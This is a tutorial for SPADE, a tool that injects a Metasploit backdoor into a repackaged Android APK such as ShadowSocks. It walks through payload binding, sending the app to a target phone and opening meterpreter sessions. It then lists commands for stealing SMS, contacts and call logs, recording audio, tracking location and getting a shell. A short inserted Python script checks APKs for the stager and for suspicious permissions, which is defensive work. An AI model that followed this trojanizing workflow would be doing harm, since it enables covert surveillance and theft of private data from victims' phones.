SPADE, an Android phone backdoor control tool; security researchers can use it to understand and study how Android backdoors work.
0x01 Preface:
For some ordinary applications, this tool can decompile them, insert code, and recompile them, but there are other APKs for which this does not work!
Here we use the ShadowSocks.apk that everyone uses for getting over the Great Firewall as the demonstration example.
The system used for this trial is Ubuntu 14.04.1 LTS; naturally, Metasploit must already be installed on your host.
0x02 Setup:
0x01:
First, git clone the code to the local machine.
git clone https://github.com/suraj-root/spade.git
0x02:
A freshly installed Ubuntu system does not ship with a Java environment, so we install the default one.
Type java at the command line and press Enter; then install the default-jre environment:
apt-get install default-jre
0x03:
The environment is now set up. Next, use the following commands to start binding the malicious payload into the APK:
cd spade/
./spade.py /root/ShadowSocks.apk
[Screenshot: at the three arrows shown in the output, the Payload, LHOST and LPORT need to be set.]
[Screenshot of the intermediate steps.]
When asked whether to start listening now, we choose yes, which drops us into msfconsole.
Now we go back to the spade directory and see the many files it has generated: [screenshot]
0x04:
Now you can send the APK, or a download link to it, to the target phone; as soon as the APK is installed and run, the malicious payload we configured executes.
When the phone runs the APK, the following prompt appears: [screenshot]
Afterwards, check the actual control result with these commands:
sessions -l   # list the current sessions
sessions -i 1 # interact with the target phone's session
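From the defender's side, an APK rebuilt the way described above carries two tell-tale signs: the Metasploit Android stager's classes end up in classes.dex, and the manifest gains permissions that the meterpreter Android commands (dump_sms, record_mic, and so on) depend on but that a proxy client never needs. The following Python check is an added example, not part of SPADE or the original post; the stager class prefix `Lcom/metasploit/stage/` is an assumed indicator string, and both sample APKs are constructed in-memory zip files rather than real packages.

```python
import io
import zipfile

# Class-descriptor prefix of Metasploit's Android payload template (assumed indicator).
STAGER_MARKER = b"Lcom/metasploit/stage/"

# Permissions the injected stager needs for the meterpreter Android commands shown in
# this walkthrough. A proxy client such as ShadowSocks has no reason to request them.
COMMAND_PERMISSIONS = {
    "android.permission.READ_SMS": "dump_sms",
    "android.permission.SEND_SMS": "send_sms",
    "android.permission.READ_CALL_LOG": "dump_calllog",
    "android.permission.READ_CONTACTS": "dump_contacts",
    "android.permission.RECORD_AUDIO": "record_mic",
    "android.permission.ACCESS_FINE_LOCATION": "geolocate",
}

def scan_apk(apk_bytes: bytes) -> dict:
    """Return {'stager': bool, 'permissions': {permission: meterpreter command}}."""
    stager, perms = False, {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            data = z.read(name)
            if name.endswith(".dex") and STAGER_MARKER in data:
                stager = True
            if name == "AndroidManifest.xml":
                # The binary manifest's string pool is UTF-8 or UTF-16LE; check both.
                for perm, cmd in COMMAND_PERMISSIONS.items():
                    if perm.encode() in data or perm.encode("utf-16-le") in data:
                        perms[perm] = cmd
    return {"stager": stager, "permissions": perms}

def build_apk(manifest_perms, dex_classes) -> bytes:
    """Constructed stand-in for an APK: a zip holding a manifest and one dex file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", "\x00".join(manifest_perms).encode("utf-16-le"))
        z.writestr("classes.dex", b"dex\n035\x00" + "".join(dex_classes).encode())
    return buf.getvalue()

# Constructed samples: the clean proxy client, and the same app after payload injection.
CLEAN_APK = build_apk(["android.permission.INTERNET"], ["Lcom/example/proxy/Main;"])
TROJANIZED_APK = build_apk(
    ["android.permission.INTERNET", "android.permission.READ_SMS", "android.permission.RECORD_AUDIO"],
    ["Lcom/example/proxy/Main;", "Lcom/metasploit/stage/Payload;"],
)

if __name__ == "__main__":
    for label, apk in (("clean", CLEAN_APK), ("trojanized", TROJANIZED_APK)):
        print(label, scan_apk(apk))
```

Re-signing is unavoidable after rebuilding, so comparing the APK's signing certificate against the vendor's known-good fingerprint is the stronger check in practice; this script does not parse the PKCS#7 signature block.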
0x03 Execution:
Now you can play around with the target phone; type help to see a description of every command:
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Android Commands
================
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information
The most intrusive functions are listed below:
sysinfo Gets information about the remote system, such as OS (retrieve the current system information)
dump_calllog Get call log (retrieve the phone's call history)
dump_contacts Get contacts list (retrieve the phone's contact list)
dump_sms Get sms messages (retrieve the phone's text messages)
send_sms Sends SMS from target session (send a text message to anyone in place of the phone's owner, e.g. send_sms -d 10086 -t I love you!)
shell (get a terminal on the phone)